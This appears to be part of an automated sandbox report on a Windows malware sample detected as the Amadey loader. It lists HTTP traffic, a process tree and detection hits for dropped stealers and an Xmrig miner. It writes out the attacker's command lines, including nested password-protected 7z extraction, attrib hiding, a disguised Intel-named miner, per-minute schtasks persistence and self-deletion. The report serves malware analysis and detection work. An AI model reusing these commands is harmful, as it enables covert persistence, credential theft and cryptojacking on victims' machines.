                                                                                                                                                                                          2024-12-18 08:07:59 UTC15331OUTData Raw: 35 d6 eb 87 90 2d c9 36 c1 4b bd 06 05 6b 30 31 a5 98 04 1b 1b d2 ac 33 86 7a 7d 36 0b 50 6a 05 49 9b 30 24 cc d1 02 f5 a1 33 c3 d5 cd 10 15 87 48 c6 f0 5c df cd 4f b5 7c 5d 98 f7 1d e4 0f f5 2e 0e f8 79 86 cf f5 ae 56 ed 3d ad 15 34 fb 99 ec 37 8b a1 0f 99 73 62 b2 4e 35 d2 e9 7e af fc d9 dc bb fe 6c 9e c1 d8 ac 2e 85 a5 4e fc 4f 6d 60 2f f1 0b 7a 9c ed 03 f1 69 62 94 71 88 d5 6d 43 9e 32 9f ff 50 58 fa 3b d8 7d 5c fc e3 c4 fa 1b 14 70 1b 1e 1c 60 5f 07 f2 a4 ec ea c8 99 c6 d9 0d 47 fa 50 7f 38 ab 9d 85 40 81 70 ff e5 85 6b 1b 11 ee b7 81 5e 29 10 14 04 ee c3 9e 93 08 78 60 a7 0b 3c f0 07 cc 1f 16 b8 85 c7 55 57 6b 1d 0b e7 24 40 64 b9 0c 58 21 f0 fb 76 ce 0a 82 7e d4 6a cc 52 ca fc dc 03 cf c7 7e f6 66 cb f7 9c 2b 6f 14 97 37 59 31 23 9d 13 3f 5c 04 86
                                                                                                                                                                                          Data Ascii: 5-6Kk013z}6PjI0$3H\O|].yV=47sbN5~l.NOm`/zibqmC2PX;}\p`_GP8@pk^)x`<UWk$@dX!v~jR~f+o7Y1#?\
                                                                                                                                                                                          2024-12-18 08:08:01 UTC1044INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:08:01 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=bpqv4uj7fjq2kal0g1sul3rl8c; expires=Sun, 13-Apr-2025 01:54:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ul75Cz0e861ael%2FICwQ88PezTXkEzomeaqaaDP%2BT3i7rWoDDdQR%2Ben%2BITGe8zt4OnJlEjmSdhesPglsNCI3HwouiNF%2FD4l2F%2BKF6EZRnldeYUT%2FxzABiEtaQhCb6Dg1T"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f3da9968d8543dc-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1711&rtt_var=651&sent=341&recv=593&lost=0&retrans=0&sent_bytes=2828&recv_bytes=573905&delivery_rate=1668571&cwnd=239&unsent_bytes=0&cid=61f20b1e6fe2e15d&ts=2295&x=0"


                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:03:06:01
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                          Imagebase:0x890000
                                                                                                                                                                                          File size:3'003'904 bytes
                                                                                                                                                                                          MD5 hash:4072633A022E6587009B5CA189FF4613
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1416758119.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                          Start time:03:06:03
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                          Imagebase:0x600000
                                                                                                                                                                                          File size:3'003'904 bytes
                                                                                                                                                                                          MD5 hash:4072633A022E6587009B5CA189FF4613
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1443119669.0000000004690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                          • Detection: 50%, ReversingLabs
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                          Start time:03:07:00
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          Imagebase:0x600000
                                                                                                                                                                                          File size:3'003'904 bytes
                                                                                                                                                                                          MD5 hash:4072633A022E6587009B5CA189FF4613
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2004346887.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                          Start time:03:07:11
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe"
                                                                                                                                                                                          Imagebase:0x920000
                                                                                                                                                                                          File size:776'832 bytes
                                                                                                                                                                                          MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                          Start time:03:07:11
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff6ee680000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                          Start time:03:07:14
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe"
                                                                                                                                                                                          Imagebase:0x920000
                                                                                                                                                                                          File size:776'832 bytes
                                                                                                                                                                                          MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                          Start time:03:07:14
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe"
                                                                                                                                                                                          Imagebase:0x920000
                                                                                                                                                                                          File size:776'832 bytes
                                                                                                                                                                                          MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                          Start time:03:07:23
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe"
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          File size:4'438'776 bytes
                                                                                                                                                                                          MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 88%, ReversingLabs
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                          Start time:03:07:27
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                          Imagebase:0x7ff6c82d0000
                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                          Start time:03:07:27
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff6ee680000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                          Start time:03:07:27
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\mode.com
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:mode 65,10
                                                                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                                                                          File size:33'280 bytes
                                                                                                                                                                                          MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                          Start time:03:07:28
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                                                                          Imagebase:0x200000
                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                          Start time:03:07:28
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                          Imagebase:0x200000
                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                          Start time:03:07:28
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                          Imagebase:0x200000
                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                          Start time:03:07:28
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                          Imagebase:0x200000
                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                          Start time:03:07:29
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                                          Imagebase:0x200000
                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                          Start time:03:07:29
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                                          Imagebase:0x200000
                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                          Start time:03:07:29
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                                          Imagebase:0x200000
                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                          Start time:03:07:29
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                                                          Imagebase:0x200000
                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                          Start time:03:07:30
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:attrib +H "in.exe"
                                                                                                                                                                                          Imagebase:0x7ff7b5d70000
                                                                                                                                                                                          File size:23'040 bytes
                                                                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                          Start time:03:07:30
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"in.exe"
                                                                                                                                                                                          Imagebase:0x7ff6bde90000
                                                                                                                                                                                          File size:1'827'328 bytes
                                                                                                                                                                                          MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                          Start time:03:07:30
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                          Imagebase:0x7ff7b5d70000
                                                                                                                                                                                          File size:23'040 bytes
                                                                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                          Start time:03:07:30
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                          Imagebase:0x7ff7b5d70000
                                                                                                                                                                                          File size:23'040 bytes
                                                                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                          Start time:03:07:30
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff6ee680000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                          Start time:03:07:30
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                                                                                          Imagebase:0x7ff68afb0000
                                                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                          Start time:03:07:30
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff6ee680000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                          Start time:03:07:30
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:powershell ping 127.0.0.1; del in.exe
                                                                                                                                                                                          Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                          Start time:03:07:30
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff6ee680000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                          Start time:03:07:30
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff6ee680000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                          Start time:03:07:31
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                                                                          Imagebase:0x7ff7be5e0000
                                                                                                                                                                                          File size:22'528 bytes
                                                                                                                                                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                          Start time:03:07:32
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe"
                                                                                                                                                                                          Imagebase:0x880000
                                                                                                                                                                                          File size:1'997'824 bytes
                                                                                                                                                                                          MD5 hash:BD7AFE46E12BF9F5E618CA61FE125634
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000023.00000003.2350989316.0000000001240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000023.00000003.2358425905.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000023.00000003.2358664230.00000000057C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000023.00000003.2360789090.00000000050A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                          Start time:03:07:32
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                          Imagebase:0x7ff719200000
                                                                                                                                                                                          File size:1'827'328 bytes
                                                                                                                                                                                          MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
